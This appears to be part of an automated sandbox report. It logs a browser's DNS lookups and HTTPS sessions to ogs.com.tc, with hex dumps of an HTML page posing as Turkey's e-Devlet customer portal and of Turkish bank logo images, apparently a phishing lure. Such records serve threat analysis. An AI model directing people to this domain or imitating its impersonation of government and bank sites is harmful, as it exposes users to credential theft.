    May 26, 2024 00:18:04.737766981 CEST53579101.1.1.1192.168.2.5
    May 26, 2024 00:18:04.807504892 CEST53610831.1.1.1192.168.2.5
    May 26, 2024 00:18:05.982848883 CEST53619211.1.1.1192.168.2.5
    May 26, 2024 00:18:06.379117966 CEST6491153192.168.2.51.1.1.1
    May 26, 2024 00:18:06.379220009 CEST6063653192.168.2.51.1.1.1
    May 26, 2024 00:18:06.650151968 CEST53606361.1.1.1192.168.2.5
    May 26, 2024 00:18:06.759232998 CEST53649111.1.1.1192.168.2.5
    May 26, 2024 00:18:08.599545002 CEST53515061.1.1.1192.168.2.5
    May 26, 2024 00:18:09.014504910 CEST5630853192.168.2.51.1.1.1
    May 26, 2024 00:18:09.015027046 CEST5127953192.168.2.51.1.1.1
    May 26, 2024 00:18:09.113560915 CEST53563081.1.1.1192.168.2.5
    May 26, 2024 00:18:09.486319065 CEST5212653192.168.2.51.1.1.1
    May 26, 2024 00:18:09.486855030 CEST6072253192.168.2.51.1.1.1
    May 26, 2024 00:18:09.496997118 CEST53521261.1.1.1192.168.2.5
    May 26, 2024 00:18:09.545742989 CEST53607221.1.1.1192.168.2.5
    May 26, 2024 00:18:09.761324883 CEST53601481.1.1.1192.168.2.5
    May 26, 2024 00:18:12.189038992 CEST53512791.1.1.1192.168.2.5
    May 26, 2024 00:18:23.278641939 CEST53526091.1.1.1192.168.2.5
    May 26, 2024 00:18:42.154979944 CEST53528631.1.1.1192.168.2.5
    May 26, 2024 00:19:04.650804996 CEST53562301.1.1.1192.168.2.5
    May 26, 2024 00:19:05.246465921 CEST53625671.1.1.1192.168.2.5

    ICMP Packets

    TimestampSource IPDest IPChecksumCodeType
    May 26, 2024 00:18:09.545981884 CEST192.168.2.51.1.1.1c1fe(Port unreachable)Destination Unreachable
    May 26, 2024 00:18:12.189295053 CEST192.168.2.51.1.1.1c21d(Port unreachable)Destination Unreachable

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    May 26, 2024 00:18:06.379117966 CEST192.168.2.51.1.1.10x4738Standard query (0)ogs.com.tcA (IP address)IN (0x0001)false
    May 26, 2024 00:18:06.379220009 CEST192.168.2.51.1.1.10xc476Standard query (0)ogs.com.tc65IN (0x0001)false
    May 26, 2024 00:18:09.014504910 CEST192.168.2.51.1.1.10x5e5fStandard query (0)ogs.com.tcA (IP address)IN (0x0001)false
    May 26, 2024 00:18:09.015027046 CEST192.168.2.51.1.1.10x6931Standard query (0)ogs.com.tc65IN (0x0001)false
    May 26, 2024 00:18:09.486319065 CEST192.168.2.51.1.1.10xbaStandard query (0)www.google.comA (IP address)IN (0x0001)false
    May 26, 2024 00:18:09.486855030 CEST192.168.2.51.1.1.10x49e5Standard query (0)www.google.com65IN (0x0001)false

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    May 26, 2024 00:18:06.759232998 CEST1.1.1.1192.168.2.50x4738No error (0)ogs.com.tc185.216.70.93A (IP address)IN (0x0001)false
    May 26, 2024 00:18:09.113560915 CEST1.1.1.1192.168.2.50x5e5fNo error (0)ogs.com.tc185.216.70.93A (IP address)IN (0x0001)false
    May 26, 2024 00:18:09.496997118 CEST1.1.1.1192.168.2.50xbaNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
    May 26, 2024 00:18:09.545742989 CEST1.1.1.1192.168.2.50x49e5No error (0)www.google.com65IN (0x0001)false
    May 26, 2024 00:18:22.127769947 CEST1.1.1.1192.168.2.50xc436No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    May 26, 2024 00:18:22.127769947 CEST1.1.1.1192.168.2.50xc436No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    May 26, 2024 00:18:36.988214970 CEST1.1.1.1192.168.2.50xa404No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    May 26, 2024 00:18:36.988214970 CEST1.1.1.1192.168.2.50xa404No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    May 26, 2024 00:18:57.544662952 CEST1.1.1.1192.168.2.50x2ac4No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    May 26, 2024 00:18:57.544662952 CEST1.1.1.1192.168.2.50x2ac4No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    May 26, 2024 00:19:23.465770006 CEST1.1.1.1192.168.2.50x6910No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
    May 26, 2024 00:19:23.465770006 CEST1.1.1.1192.168.2.50x6910No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

    HTTP Request Dependency Graph

    • ogs.com.tc
    • https:
    • fs.microsoft.com

    HTTPS Proxied Packets

    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.549709185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:07 UTC653OUTGET / HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:07 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:07 GMT
    Content-Type: text/html
    Content-Length: 10068
    Last-Modified: Thu, 23 May 2024 21:26:52 GMT
    Connection: close
    ETag: "664fb49c-2754"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:07 UTC10068INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d c3 bc c5 9f 74 65 72 69 20 50 6f 72 74 61 6c c4 b1 20 7c 20 65 2d 44 65 76 6c 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c
    Data Ascii: <!DOCTYPE html><html lang="tr"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Mteri Portal | e-Devlet</title> <l


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.549710185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:07 UTC539OUTGET /assets/css/style.css HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:08 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:08 GMT
    Content-Type: text/css
    Content-Length: 149508
    Last-Modified: Thu, 23 May 2024 21:37:04 GMT
    Connection: close
    ETag: "664fb700-24804"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:08 UTC16100INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 33 30 30 3b 30 2c 34 30 30 3b 30 2c 35 30 30 3b 30 2c 36 30 30 3b 30 2c 37 30 30 3b 30 2c 38 30 30 3b 31 2c 33 30 30 3b 31 2c 34 30 30 3b 31 2c 35 30 30 3b 31 2c 36 30 30 3b 31 2c 37 30 30 3b 31 2c 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 27 29 3b 0d 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 53 6c 61 62 3a 77 67 68 74 40 31 30 30 3b 32 30 30 3b 33 30 30 3b 34 30 30 3b 35 30 30 3b 36
    Data Ascii: @import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');@import url('https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100;200;300;400;500;6
    2024-05-25 22:18:08 UTC16384INData Raw: 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 2e 33 33 65 6d 20 72 67 62 61 28 32 30 37 2c 20 33 34 2c 20 32 38 2c 20 2e 35 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 69 63 65 46 6f 72 6d 20 2e 66 6f 72 6d 52 6f 77 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 69 63 65 46 6f 72 6d 20 2e 66 6f 72 6d 52 6f 77 20 2e 66 69 65 6c 64 43 6f 6e 66 69 72 6d 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30
    Data Ascii: box-shadow: 0 0 .33em rgba(207, 34, 28, .5); border-bottom: none}.serviceForm .formRow:last-of-type { border-bottom: none}.serviceForm .formRow .fieldConfirm { border: none; margin: 0; padding: 0; font-weight: 40
    2024-05-25 22:18:08 UTC16384INData Raw: 3a 20 2e 35 65 6d 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 69 63 65 46 6f 72 6d 2e 6f 6e 65 50 61 67 65 20 2e 66 6f 72 6d 52 6f 77 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 2e 35 65 6d 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0d 0a 20 20 20 20 2e 73 65 72 76 69 63 65 46 6f 72 6d 2e 6f 6e 65 50 61 67 65 20 2e 66 6f 72 6d 52 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f
    Data Ascii: : .5em}.serviceForm.onePage .formRow { -webkit-box-sizing: border-box; box-sizing: border-box; padding: .5em}@media (min-width: 768px) { .serviceForm.onePage .formRow { float: left; width: 50%; bo
    2024-05-25 22:18:08 UTC16384INData Raw: 74 3a 20 27 5c 65 38 30 64 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 30 65 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 74 68 2d 6c 61 72 67 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 30 66 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 74 68 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 31 30 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 31 31 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 6f 6b 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 31 32 27 0d 0a 7d 0d 0a
    Data Ascii: t: '\e80d'}.ico-camera:before { content: '\e80e'}.ico-th-large:before { content: '\e80f'}.ico-th:before { content: '\e810'}.ico-th-list:before { content: '\e811'}.ico-ok:before { content: '\e812'}
    2024-05-25 22:18:08 UTC16384INData Raw: 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 33 22 0d 0a 7d 0d 0a 0d 0a 2e 65 64 6b 2d 66 6f 6e 74 69 63 6f 6e 2d 61 70 70 73 74 6f 72 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 65 64 6b 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d
    Data Ascii: herit; text-transform: none; text-rendering: auto; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f103"}.edk-fonticon-appstore:before { font-family: edk; display: inline-block;
    2024-05-25 22:18:08 UTC16384INData Raw: 2d 71 75 65 73 74 69 6f 6e 32 33 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 65 64 6b 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 73 70 65 61 6b 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74
    Data Ascii: -question23:before { font-family: edk; display: inline-block; vertical-align: middle; line-height: 1; font-weight: 400; font-style: normal; speak: none; text-decoration: inherit; text-transform: none; text
    2024-05-25 22:18:08 UTC16384INData Raw: 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 61 75 74 6f 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0d 0a 7d 0d 0a 0d 0a 23 62 61 73 69 73 20 2e 72 6f 75 6e 64 2d 74 69 6d 65 72 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f
    Data Ascii: ction: column; flex-direction: column; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center; margin: 5px auto; border-radius: 50%; text-align: center}#basis .round-timer span { display: blo
    2024-05-25 22:18:08 UTC16384INData Raw: 34 37 61 61 31 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 74 6f 70 3a 20 2e 31 65 6d 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2e 32 35 65 6d 0d 0a 7d 0d 0a 0d 0a 23 62 61 73 69 73 20 2e 66 6f 72 6d 52 6f 77 20 2e 66 69 65 6c 64 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 32 35 65 6d
    Data Ascii: 47aa1; font-weight: 400; position: relative; top: .1em; margin-right: .25em}#basis .formRow .fieldError { border: none; margin: 0; padding: 0; font-weight: 400; list-style: none; margin-bottom: .25em
    2024-05-25 22:18:08 UTC16384INData Raw: 3b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 38 22 0d 0a 7d 0d 0a 0d 0a 23 62 61 73 69 73 20 2e 66 6f 72 6d 52 6f 77 20 2e 61 64 64 72 65 73 73 50 69 63 6b 65 72 4c 69 6e 6b 3a 62 65 66 6f 72 65 2c 0d 0a 23 62 61 73 69 73 20 2e 66 6f 72 6d 52
    Data Ascii: ; text-decoration: inherit; text-transform: none; text-rendering: auto; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f128"}#basis .formRow .addressPickerLink:before,#basis .formR
    2024-05-25 22:18:08 UTC2336INData Raw: 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 64 6f 74 74 65 64 20 23 63 38 64 61 65 33 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 31 30 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
    Data Ascii: ; -webkit-box-align: center; -ms-flex-align: center; align-items: center; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center; border: 1px dotted #c8dae3; padding: 5px 10px; border-radius:


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    2192.168.2.549714185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:08 UTC595OUTGET /assets/images/banks/akbank.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:08 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:08 GMT
    Content-Type: image/jpeg
    Content-Length: 3052
    Last-Modified: Thu, 23 May 2024 21:37:06 GMT
    Connection: close
    ETag: "664fb702-bec"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:08 UTC3052INData Raw: 52 49 46 46 e4 0b 00 00 57 45 42 50 56 50 38 20 d8 0b 00 00 90 47 00 9d 01 2a f4 01 c8 00 3e 49 24 8c 46 22 a2 21 21 24 71 f0 50 09 09 65 6e e1 76 b1 1b 10 1f dd ff 20 3b fa 28 07 4a fc 80 fc c6 f9 81 a6 ff 45 fb fb fb c9 fe cb e2 af 6a 7c ab e6 e3 c4 7f dc 3f 30 bf b1 7f ff ff ff f3 4f f9 cf e4 37 c9 7f b7 2f 70 0f d1 cf f1 9f db 7f 6a 7f c1 ff ff ff ff e0 63 cc 07 ed 1f ed 0f bc bf f7 3f f8 1f d5 7d cb 7a 00 7f 3a fe c7 ff c3 b0 3b d0 03 f6 cf ff ff b3 7f fa af fa 5f ef 3f 7f fe 8f 3f ae 7f 96 ff c5 fe d3 da 0b fe 8f 58 07 09 8f f7 2f c6 cf 09 bf c2 63 ba 81 07 dd 1f d0 fe 42 72 03 af ae f4 a5 d2 f8 50 7f 2d e9 26 94 d9 a2 ff de f3 73 f5 70 4b af 2e 08 5e a5 09 28 89 e7 17 97 04 2f 52 84 94 44 f3 8b cb 82 17 a9 42 4a 22 79 c5 e5 c1 0b d4 a1 25 11 3c e2
    Data Ascii: RIFFWEBPVP8 G*>I$F"!!$qPenv ;(JEj|?0O7/pjc?}z:;_??X/cBrP-&spK.^(/RDBJ"y%<


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    3192.168.2.549715185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:08 UTC597OUTGET /assets/images/banks/albaraka.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:09 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:08 GMT
    Content-Type: image/jpeg
    Content-Length: 36270
    Last-Modified: Thu, 23 May 2024 21:37:07 GMT
    Connection: close
    ETag: "664fb703-8dae"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:09 UTC16100INData Raw: ff d8 ff e1 0b d3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 32 30 3a 31 39 3a 32 37 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 20:19:27"
